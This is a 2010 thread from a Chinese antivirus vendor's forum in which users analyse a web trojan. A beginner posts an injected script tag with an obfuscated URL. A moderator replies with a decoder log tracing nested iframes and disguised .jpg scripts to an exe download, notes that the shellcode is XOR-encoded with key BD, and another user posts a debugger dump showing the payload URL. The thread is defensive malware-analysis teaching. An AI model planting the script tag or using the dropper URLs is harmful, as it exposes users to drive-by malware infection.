瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网马分析
带脚镣跳舞 - 2010-1-5 15:55:00
看了版主的教程,想自己学习下,结果卡住了,地址如下:请高手们分析下,让小弟入个门
<script language=javascript src=http://ne%62.xo%72g.%70l/c.js?google_ad=11×109_ad></script>

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; CIBA; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2010-1-5 15:58:00
Log generated by networkedition use mdecoder 0.30
[root]http://ne%62.xo%72g.%70l/c.js?google_ad=11×109_ad
    [iframe]http://xbj.ss.la/17/219sd.htm
        [iframe]http://xbj.ss.la/17/av.htm
            [iframe]http://xbj.ss.la/17/mp.htm
                [script]http://xbj.ss.la/17/ll.jpg
                [script]http://xbj.ss.la/17/ll1.jpg
                [script]http://xbj.ss.la/17/upp.jpg
                    [exe]http://xbj.ss.la/l/xx.exe
                [script]http://xbj.ss.la/17/llll1.jpg
                [script]http://xbj.ss.la/17/llll.jpg
                [script]http://xbj.ss.la/17/lllll.jpg
            [iframe]http://xbj.ss.la/17/nod.htm
                [iframe]http://xbj.ss.la/17/lz.htm
                    [script]http://xbj.ss.la/17/oopk.jpg
                        [exe]http://xbj.ss.la/l/xx.exe
                    [script]http://xbj.ss.la/17/ll1.jpg
                    [script]http://xbj.ss.la/17/lz.jpg
            [iframe]http://xbj.ss.la/17/real.htm
                [iframe]http://xbj.ss.la/17/myra.htm
                    [script]http://xbj.ss.la/17/myr.jpg
                        [exe]http://xbj.ss.la/l/xx.exe
            [iframe]http://xbj.ss.la/17/rising.htm
                [iframe]http://xbj.ss.la/17/ofnt.htm
                    [script]http://xbj.ss.la/17/oopk.jpg
                    [script]http://xbj.ss.la/17/uug.jpg
        [script]http://xbj.ss.la/17/fa.js
            [iframe]http://xbj.ss.la/17/fla.htm
                [iframe]http://xbj.ss.la/17/ff.html
                [iframe]http://xbj.ss.la/17/ie.html
                [iframe]http://xbj.ss.la/17/ff.html
                [iframe]http://xbj.ss.la/17/ie.html
                [iframe]http://xbj.ss.la/17/ff.html
                [iframe]http://xbj.ss.la/17/ff.html
带脚镣跳舞 - 2010-1-5 16:39:00
版主见图
带脚镣跳舞 - 2010-1-5 16:40:00
版主见图
带脚镣跳舞 - 2010-1-5 16:42:00
带脚镣跳舞 - 2010-1-5 16:44:00
到了最后几步解决不了
1、版主怎么知道去看upp.jpg而不是其他的
2、我解到最后只有乱码而没有xx.exe
3、用的是eye过滤  ESC解码
请斑竹指点
networkedition - 2010-1-5 16:45:00
http://xbj.ss.la/17/upp.jpg
shellcode XOR BD
带脚镣跳舞 - 2010-1-5 17:01:00
斑竹呀,郁闷,看到是SHELLCODE可还不会操作
看了教程是连续两次ESC即可搞定
你上面写的shellcode xor bd
我看不明白,就当我是个白痴吧,你耐心指点下
networkedition - 2010-1-5 17:05:00
这个是带密钥的shellcode,第二次esc前需要输入密钥:BD即可。
是昔流芳 - 2010-1-5 22:10:00
EAX 7D689B86 shell32.SHGetSpecialFolderPathA
ECX 00000000
EDX 00000000
EBX 0012FF34
ESP 0012FEA4
EBP 7D590000 offset shell32.#599
ESI 00405343 MyOutPut.00405343
EDI 004053A3 ASCII "http://xbk.ss.la/l/xx.exe"
EIP 004050C1 MyOutPut.004050C1
C 0  ES 0023 32位 0(FFFFFFFF)
P 0  CS 001B 32位 0(FFFFFFFF)
A 0  SS 0023 32位 0(FFFFFFFF)
Z 0  DS 0023 32位 0(FFFFFFFF)
S 0  FS 003B 32位 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +UNORM 3704 7C8136F1 0012BC4C
ST1 empty +UNORM 710C 0B2F0484 0B2F7106
ST2 empty -UNORM F000 00000000 0062F4A0
ST3 empty +UNORM 0484 0B2F7106 00661ACA
ST4 empty +UNORM 1ACA 00000000 00661A78
ST5 empty +UNORM 0020 00000036 0B2F04F0
ST6 empty 1.0000000000000000000
ST7 empty 1.0000000000000000000
              3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  掩码    1 1 1 1 1 1
1
查看完整版本: 网马分析
© 2000 - 2025 Rising Corp. Ltd.